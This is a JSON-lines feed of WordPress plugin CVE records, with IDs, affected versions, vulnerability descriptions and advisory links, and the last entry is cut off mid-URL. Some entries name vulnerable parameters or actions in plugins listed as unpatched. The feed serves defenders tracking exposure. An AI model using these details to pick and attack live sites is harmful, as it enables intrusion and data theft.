{"CVE_ID":"CVE-2024-4431","slug":"lastudio-element-kit","versionImpact":"1.3.7.6","description":"The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 1.3.7.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c87204d-6697-4d06-aad2-279fa95f503a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c87204d-6697-4d06-aad2-279fa95f503a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/team-member\\\/global\\\/custom.php#L157\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/team-member\\\/global\\\/custom.php#L157\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/posts\\\/global\\\/index.php#L116\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/posts\\\/global\\\/index.php#L116\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/banner-list\\\/global\\\/index.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/banner-list\\\/global\\\/index.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/testimonials\\\/global\\\/index.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/testimonials\\\/global\\\/index.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/images-layout\\\/global\\\/index.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/images-layout\\\/global\\\/index.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/instagram-feed\\\/global\\\/index.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/instagram-feed\\\/global\\\/index.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/advanced-carousel\\\/global\\\/simple\\\/items-loop-end.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/templates\\\/advanced-carousel\\\/global\\\/simple\\\/items-loop-end.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090513\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090513\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lastudio-element-kit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lastudio-element-kit\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6823","slug":"media-library-assistant","versionImpact":"3.18","description":"The Media Library Assistant plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation involving the mla-inline-edit-upload-scripts AJAX action in all versions up to, and including, 3.18. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a446fe7-c97a-436e-b494-b924e6518297?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a446fe7-c97a-436e-b494-b924e6518297?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-settings.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-settings.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/media-library-assistant\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/media-library-assistant\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133909\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133909\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8959","slug":"adminify","versionImpact":"4.0.1.6","description":"The WP Adminify \u2013 Custom WordPress Dashboard, Login and Admin Customizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 4.0.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68094545-0e2a-429d-95b7-bfa86eca1caa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68094545-0e2a-429d-95b7-bfa86eca1caa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/adminify\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/adminify\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpadminify.com\\\/changelogs\",\"name\":\"https:\\\/\\\/wpadminify.com\\\/changelogs\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165558\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165558\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10179","slug":"slick-engagement","versionImpact":"1.4.4","description":"The Slickstream: Engagement and Conversions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's slick-grid shortcode in all versions up to, and including, 1.4.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28216197-20b4-4d12-a610-661dca6fbbf2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28216197-20b4-4d12-a610-661dca6fbbf2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slick-engagement\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slick-engagement\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184136\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184136\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11431","slug":"ragic-shortcode","versionImpact":"1.2","description":"The Ragic Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ragic' shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ragic-shortcode\\\/trunk\\\/ragic.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ragic-shortcode\\\/trunk\\\/ragic.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194610%40ragic-shortcode&new=3194610%40ragic-shortcode&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194610%40ragic-shortcode&new=3194610%40ragic-shortcode&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ragic-shortcode\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ragic-shortcode\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4afa0148-ad08-493d-9642-0edbde5e8349?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4afa0148-ad08-493d-9642-0edbde5e8349?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23828","slug":"wordpress-data-guards","versionImpact":"8","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in OriginalTips.com WordPress Data Guard allows Stored XSS.This issue affects WordPress Data Guard: from n\/a through 8.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-data-guards\\\/vulnerability\\\/wordpress-wordpress-data-guard-website-security-plugin-8-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-data-guards\\\/vulnerability\\\/wordpress-wordpress-data-guard-website-security-plugin-8-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8702","slug":"backup-database","versionImpact":"4.9","description":"The Backup Database WordPress plugin through 4.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2199ef66-25bd-4eb4-a675-d8b30f047847\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2199ef66-25bd-4eb4-a675-d8b30f047847\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-41620","slug":"seosamba-webmasters","versionImpact":"1.0.5","description":"Cross-Site Request Forgery (CSRF) vulnerability in SeoSamba for WordPress Webmasters plugin <= 1.0.5 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/seosamba-webmasters\\\/wordpress-seosamba-for-wordpress-webmasters-plugin-1-0-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/seosamba-webmasters\\\/wordpress-seosamba-for-wordpress-webmasters-plugin-1-0-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2278","slug":"wpdirectorykit","versionImpact":"1.1.9","description":"The WP Directory Kit plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.1.9 via the 'wdk_public_action' function. This allows unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2904689\\\/wpdirectorykit\\\/trunk\\\/vendor\\\/Winter_MVC\\\/core\\\/mvc_loader.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2904689\\\/wpdirectorykit\\\/trunk\\\/vendor\\\/Winter_MVC\\\/core\\\/mvc_loader.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87399a07-d2d8-42cd-81f0-9060f6cfff48?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87399a07-d2d8-42cd-81f0-9060f6cfff48?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdirectorykit\\\/tags\\\/1.1.8\\\/vendor\\\/Winter_MVC\\\/core\\\/mvc_loader.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdirectorykit\\\/tags\\\/1.1.8\\\/vendor\\\/Winter_MVC\\\/core\\\/mvc_loader.php#L91\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5956","slug":"advanced-quiz","versionImpact":"1.0.3","description":"The Wp-Adv-Quiz WordPress plugin through 1.0.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b3d1fbae-88c9-45d1-92c6-0a529b21e3b2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b3d1fbae-88c9-45d1-92c6-0a529b21e3b2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1282","slug":"email-encoder-bundle","versionImpact":"2.2.0","description":"The Email Encoder \u2013 Protect Email Addresses and Phone Numbers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78da1f88-2446-4ea5-9437-a118324ab6c2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78da1f88-2446-4ea5-9437-a118324ab6c2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/tags\\\/2.2.0\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-run.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/tags\\\/2.2.0\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-run.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/tags\\\/2.2.0\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-helpers.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/tags\\\/2.2.0\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-helpers.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/tags\\\/2.2.0\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-validate.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/tags\\\/2.2.0\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-validate.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3033889%40email-encoder-bundle%2Ftrunk&old=3020142%40email-encoder-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3033889%40email-encoder-bundle%2Ftrunk&old=3020142%40email-encoder-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6809","slug":"beepress","versionImpact":"0.1","description":"The Custom fields shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cf shortcode in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping on user supplied custom post meta values. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99d3d5aa-dd82-415a-bc40-9d2c677d9248?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99d3d5aa-dd82-415a-bc40-9d2c677d9248?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/beepress\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/beepress\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1678","slug":"subway","versionImpact":"2.1.4","description":"The Subway \u2013 Private Site Option plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.1.4 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's private site feature and view restricted page and post content.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b80638b-4dd1-47f5-9a70-6bd626ac6986?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b80638b-4dd1-47f5-9a70-6bd626ac6986?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/subway\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/subway\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4895","slug":"wpdatatables","versionImpact":"3.4.2.12","description":"The wpDataTables \u2013 WordPress Data Table, Dynamic Tables & Table Charts Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the CSV import functionality in all versions up to, and including, 3.4.2.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c944e08-1b70-4b56-80eb-f588c0fab5b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c944e08-1b70-4b56-80eb-f588c0fab5b6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089897\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089897\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpdatatables\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpdatatables\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6028","slug":"quiz-maker","versionImpact":"6.5.8.3","description":"The Quiz Maker plugin for WordPress is vulnerable to time-based SQL Injection via the 'ays_questions' parameter in all versions up to, and including, 6.5.8.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab340c65-35eb-4a85-8150-3119b46c7f35?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab340c65-35eb-4a85-8150-3119b46c7f35?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quiz-maker\\\/tags\\\/6.5.7.5\\\/public\\\/class-quiz-maker-public.php#L4904\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quiz-maker\\\/tags\\\/6.5.7.5\\\/public\\\/class-quiz-maker-public.php#L4904\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quiz-maker\\\/tags\\\/6.5.7.5\\\/public\\\/class-quiz-maker-public.php#L6901\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quiz-maker\\\/tags\\\/6.5.7.5\\\/public\\\/class-quiz-maker-public.php#L6901\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quiz-maker\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quiz-maker\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103402\\\/quiz-maker\\\/tags\\\/6.5.8.2\\\/public\\\/class-quiz-maker-public.php?old=3102679&old_path=quiz-maker%2Ftags%2F6.5.8.1%2Fpublic%2Fclass-quiz-maker-public.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103402\\\/quiz-maker\\\/tags\\\/6.5.8.2\\\/public\\\/class-quiz-maker-public.php?old=3102679&old_path=quiz-maker%2Ftags%2F6.5.8.1%2Fpublic%2Fclass-quiz-maker-public.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105555\\\/quiz-maker\\\/tags\\\/6.5.8.4\\\/public\\\/class-quiz-maker-public.php?old=3104323&old_path=quiz-maker%2Ftags%2F6.5.8.3%2Fpublic%2Fclass-quiz-maker-public.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105555\\\/quiz-maker\\\/tags\\\/6.5.8.4\\\/public\\\/class-quiz-maker-public.php?old=3104323&old_path=quiz-maker%2Ftags%2F6.5.8.3%2Fpublic%2Fclass-quiz-maker-public.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8056","slug":"mm-breaking-news","versionImpact":"0.7.9","description":"The MM-Breaking News WordPress plugin through 0.7.9 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/203b8122-f1e5-4e9e-ba83-f5cd59d8a289\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/203b8122-f1e5-4e9e-ba83-f5cd59d8a289\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23823","slug":"cnzz51la-for-wordpress","versionImpact":"1.0.1","description":"Cross-Site Request Forgery (CSRF) vulnerability in jprintf CNZZ&51LA for WordPress allows Cross Site Request Forgery.This issue affects CNZZ&51LA for WordPress: from n\/a through 1.0.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/cnzz51la-for-wordpress\\\/vulnerability\\\/wordpress-cnzz-51la-for-wordpress-plugin-1-0-1-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/cnzz51la-for-wordpress\\\/vulnerability\\\/wordpress-cnzz-51la-for-wordpress-plugin-1-0-1-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0809","slug":"permalink-finder","versionImpact":"3.4","description":"The Link Fixer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via broken links in all versions up to, and including, 3.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/permalink-finder\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/permalink-finder\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37198f2f-2b45-40d3-b4ae-aa94213996bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37198f2f-2b45-40d3-b4ae-aa94213996bd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13809","slug":"hslide","versionImpact":"1.3.5","description":"The Hero Slider - WordPress Slider Plugin plugin for WordPress is vulnerable to SQL Injection via several parameters in all versions up to, and including, 1.3.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/hero-slider-wordpress-slider-plugin\\\/13067813\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/hero-slider-wordpress-slider-plugin\\\/13067813\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a692d9c4-66e0-4461-ad13-65e1446106c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a692d9c4-66e0-4461-ad13-65e1446106c5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2576","slug":"ayyash-studio","versionImpact":"1.0.3","description":"The Ayyash Studio \u2014 The kick-start kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ayyash-studio\\\/tags\\\/1.0.3\\\/includes\\\/Importer\\\/Wxr\\\/StudioImporter.php#L351\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ayyash-studio\\\/tags\\\/1.0.3\\\/includes\\\/Importer\\\/Wxr\\\/StudioImporter.php#L351\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ayyash-studio\\\/tags\\\/1.0.3\\\/includes\\\/Importer\\\/Wxr\\\/StudioImporter.php#L37\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ayyash-studio\\\/tags\\\/1.0.3\\\/includes\\\/Importer\\\/Wxr\\\/StudioImporter.php#L37\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ayyash-studio\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ayyash-studio\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/634fa1ed-ad6b-4875-b6f9-f20add39dc80?source=cve\",\"name\":\"https:\\\/\\\/www.w